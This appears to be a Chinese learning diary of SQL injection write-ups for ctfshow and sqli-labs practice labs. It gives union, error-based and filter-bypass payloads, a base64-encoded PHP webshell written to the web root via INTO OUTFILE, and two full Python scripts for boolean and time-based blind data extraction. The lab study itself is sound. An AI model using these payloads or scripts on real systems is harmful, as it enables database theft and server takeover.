学习日记-2(SQL注入篇)

awovkj2025-11-102026-01-10

先学学sql注入

web171

1	1' or '1 #后面的数字会被解析为true

web172

输入1试一下，返回username,password两列，联合注入前后表格列数必须相等

题目给了表名与列名，又因为username !='flag' 返回flag会报错

让其返回id与password两列

1	99999' union select id,password from ctfshow_user2 where username='flag

web173

思路同上，要返回三列

select 1,2 1,2占位可以用1,’a’等替换

1' union select 1,2,password from ctfshow_user3--+
也可以使用replace()，hex()等处理返回的username
1' union select id,hex(username),password from ctfshow_user3--+
1' union select id,replace(username,'a',1),password from ctfshow_user3--+  #a被替换为1

web174

过滤了数字，

1
2

999' union select replace(username,'f','d'), REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password, 0, 'zero'), 1, 'one'), 2, 'two'), 3, 'three'), 4, 'four'), 5, 'five'), 6, 'six'), 7, 'seven'), 8, 'eight'), 9, 'nine') from ctfshow_user4 where username='flag'--+
然后换回去

基础:https://jwt1399.top/posts/32179.html#toc-heading-3

https://www.bilibili.com/video/BV1c34y1h7So?spm_id_from=333.788.videopod.episodes&vd_source=8b2c1dd38d62bbc8b8c23948991bfd4d&p=8

web175

1.将结果写入文件,然后访问

1	99' union select 1,password from ctfshow_user5 into outfile '/var/www/html/7.txt'--+

2.写入一句话木马,先base64然后编码

1	4541' union select 1,from_base64("%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6f%4a%46%39%51%54%31%4e%55%57%79%4a%7a%5a%43%4a%64%4b%54%73%2f%50%67%3d%3d") into outfile '/var/www/html/13.php

然后使用蚁剑连接(反正我连不上，可能我的蚁剑出问题了，都能执行命令了)

SQL注入文件读写:https://www.cnblogs.com/seven-note/p/14485739.html

web176

同171

web177+178

尝试发现过滤空格,—+

1	999'%09union%09select%091,2,password%09from%09ctfshow_user%23

web179

在之前基础上过滤了%09，%0a

1	999'%0cunion%0cselect%0c1,2,password%0cfrom%0cctfshow_user%23

web180

—+,%23被过滤

1	999'union%0cselect'1',(select(password)from(ctfshow_user)where(username='flag')),'3

web181

1	666'or(username='flag')and'1'='1

web182

1	666'or(id=26)and'1'='1或者666'or(username%0clike'%fla%')and'1'='1

web183

sqli-labs靶场

Less-1

1	?id=1+1 ?id=1' order by 4 --+ ?id=-1' union select 1,2,3 --+

判断为字符型,闭合方式为’’,有3列,回显位为2,3

获取库名
?id=-1' union select 1,2,group_concat(schema_name)  from information_schema.schemata --+
表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
列名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
数据
?id=-1' union select 1,2,group_concat(id,username,password) from users --+

按照以上方法即可获取任意数据

Less-2

改为数字型即可

Less-3

闭合方式改为(’’)即可

Less-4

闭合方式改为(””)即可

Less-5

字符型,闭合方式为’’,根据回显使用报错注入

1	?id=1' and updatexml(1, concat(0x7e, substring((select group_concat(schema_name) from information_schema.schemata), 1, 32)), 1) --+

修改红色部分,同时修改substring参数即可

1	?id=1' and updatexml(1, concat(0x7e, substring((select group_concat(id,username,password) from users), 1, 32)), 1) --+

Less-6

同5,闭合方式改为””

Less-7

字符型,闭合方式为’))

使用布尔盲注

import requests

URL = "http://127.0.0.1/sqli-labs-master/Less-7/"
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@{}.-"
MAX_LEN = 30
TRUE_MARK = "You are in.... Use outfile......"
HEADERS = {"User-Agent": "Mozilla/5.0"}

def is_true(payload):
    full_url = f"{URL}?id=1')) AND {payload}--+"
    try:
        res = requests.get(full_url, headers=HEADERS, timeout=5)
        return TRUE_MARK in res.text
    except:
        return False

def extract_string(sql_expr, tag="item", index=0):
    result = ''
    for pos in range(1, MAX_LEN + 1):
        found = False
        for ch in CHARSET:
            payload = f"SUBSTR(({sql_expr}),{pos},1)='{ch}'"
            if is_true(payload):
                result += ch
                print(f"[{tag}] ({index}) Char {pos}: {ch}")
                found = True
                break
        if not found:
            break
    return result

def get_database_name():
    print("\n[+] Getting current database name:")
    return extract_string("SELECT database()", "DB")

def get_table_names(db):
    print(f"\n[+] Getting table names from database `{db}`")
    tables = []
    for i in range(0, 10):
        sql = f"SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {i},1"
        table = extract_string(sql, "Table", i)
        if table:
            tables.append(table)
        else:
            break
    return tables

def get_column_names(db, table):
    print(f"\n[+] Getting column names from table `{table}`")
    columns = []
    for i in range(0, 10):
        sql = f"SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {i},1"
        col = extract_string(sql, "Column", i)
        if col:
            columns.append(col)
        else:
            break
    return columns

def get_column_data(table, column):
    print(f"\n[+] Getting data from `{table}`.`{column}`")
    data = []
    for i in range(0, 10):
        sql = f"SELECT {column} FROM {table} LIMIT {i},1"
        value = extract_string(sql, "Data", i)
        if value:
            data.append(value)
        else:
            break
    return data

def choose_from_list(lst, prompt="Choose item"):
    print(f"\n{prompt}:")
    for idx, item in enumerate(lst):
        print(f"{idx}: {item}")
    while True:
        try:
            i = int(input(f"> Enter index (0-{len(lst)-1}): ").strip())
            if 0 <= i < len(lst):
                return lst[i]
        except:
            pass
        print("Invalid input. Try again.")

if __name__ == '__main__':
    print("🛡 Boolean-Based Blind SQL Injection Tool (闭合方式: ')) )")

    db = get_database_name()
    print(f"[✓] Current Database: {db}")

    tables = get_table_names(db)
    if not tables:
        print("[-] No tables found.")
        exit()

    chosen_table = choose_from_list(tables, prompt="📂 Select a table to explore")

    columns = get_column_names(db, chosen_table)
    if not columns:
        print("[-] No columns found in this table.")
        exit()

    chosen_column = choose_from_list(columns, prompt="📄 Select a column to dump data from")

    values = get_column_data(chosen_table, chosen_column)
    print(f"\n[✓] Extracted Data from `{chosen_table}`.`{chosen_column}`:")
    for v in values:
        print(f"  - {v}")

Less-8

闭合方式改为’’,标志改为You are in……即可

Less-9

闭合方式为’’

使用时间盲注

import requests
import time

URL = "http://127.0.0.1/sqli-labs-master/Less-9/"
CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@{}.-"
MAX_LEN = 30
SLEEP_TIME = 3  # 注入成功时延迟秒数
THRESHOLD = 2.5  # 判断为“真”的时间阈值
HEADERS = {"User-Agent": "Mozilla/5.0"}

def is_true(payload):
    injected = f"{URL}?id=1' AND IF({payload}, SLEEP({SLEEP_TIME}), 0)--+"
    try:
        start = time.time()
        res = requests.get(injected, headers=HEADERS, timeout=SLEEP_TIME + 1)
        duration = time.time() - start
        return duration >= THRESHOLD
    except requests.exceptions.ReadTimeout:
        return True  # 如果真的睡了，可能触发超时
    except:
        return False

def extract_string(sql_expr, tag="item", index=0):
    result = ''
    for pos in range(1, MAX_LEN + 1):
        found = False
        for ch in CHARSET:
            payload = f"SUBSTR(({sql_expr}),{pos},1)='{ch}'"
            if is_true(payload):
                result += ch
                print(f"[{tag}] ({index}) Char {pos}: {ch}")
                found = True
                break
        if not found:
            break
    return result

def get_database_name():
    print("\n[+] Getting current database name:")
    return extract_string("SELECT database()", "DB")

def get_table_names(db):
    print(f"\n[+] Getting table names from database `{db}`")
    tables = []
    for i in range(0, 10):
        sql = f"SELECT table_name FROM information_schema.tables WHERE table_schema='{db}' LIMIT {i},1"
        table = extract_string(sql, "Table", i)
        if table:
            tables.append(table)
        else:
            break
    return tables

def get_column_names(db, table):
    print(f"\n[+] Getting column names from table `{table}`")
    columns = []
    for i in range(0, 10):
        sql = f"SELECT column_name FROM information_schema.columns WHERE table_schema='{db}' AND table_name='{table}' LIMIT {i},1"
        col = extract_string(sql, "Column", i)
        if col:
            columns.append(col)
        else:
            break
    return columns

def get_column_data(table, column):
    print(f"\n[+] Getting data from `{table}`.`{column}`")
    data = []
    for i in range(0, 10):
        sql = f"SELECT {column} FROM {table} LIMIT {i},1"
        value = extract_string(sql, "Data", i)
        if value:
            data.append(value)
        else:
            break
    return data

def choose_from_list(lst, prompt="Choose item"):
    print(f"\n{prompt}:")
    for idx, item in enumerate(lst):
        print(f"{idx}: {item}")
    while True:
        try:
            i = int(input(f"> Enter index (0-{len(lst)-1}): ").strip())
            if 0 <= i < len(lst):
                return lst[i]
        except:
            pass
        print("Invalid input. Try again.")

if __name__ == '__main__':
    print("⏱ Time-Based Blind SQL Injection Tool (闭合方式: \")")

    db = get_database_name()
    print(f"[✓] Current Database: {db}")

    tables = get_table_names(db)
    if not tables:
        print("[-] No tables found.")
        exit()

    chosen_table = choose_from_list(tables, prompt="📂 Select a table to explore")

    columns = get_column_names(db, chosen_table)
    if not columns:
        print("[-] No columns found in this table.")
        exit()

    chosen_column = choose_from_list(columns, prompt="📄 Select a column to dump data from")

    values = get_column_data(chosen_table, chosen_column)
    print(f"\n[✓] Extracted Data from `{chosen_table}`.`{chosen_column}`:")
    for v in values:
        print(f"  - {v}")

Less-10

闭合方式改为””

Less-11

字符型,闭合方式为’’,有两列,使用联合注入,同第一题将—+改为#

1	-1' union select 1,group_concat(schema_name) from information_schema.schemata #

Less-12

同上,闭合方式改为”)即可

Less-13

闭合方式为’),没用回显,使用报错注入,同第5题

1	1' )and updatexml(1, concat(0x7e, substring((select group_concat(schema_name) from information_schema.schemata), 1, 32)), 1) #

Less-14

同上,闭合方式改为””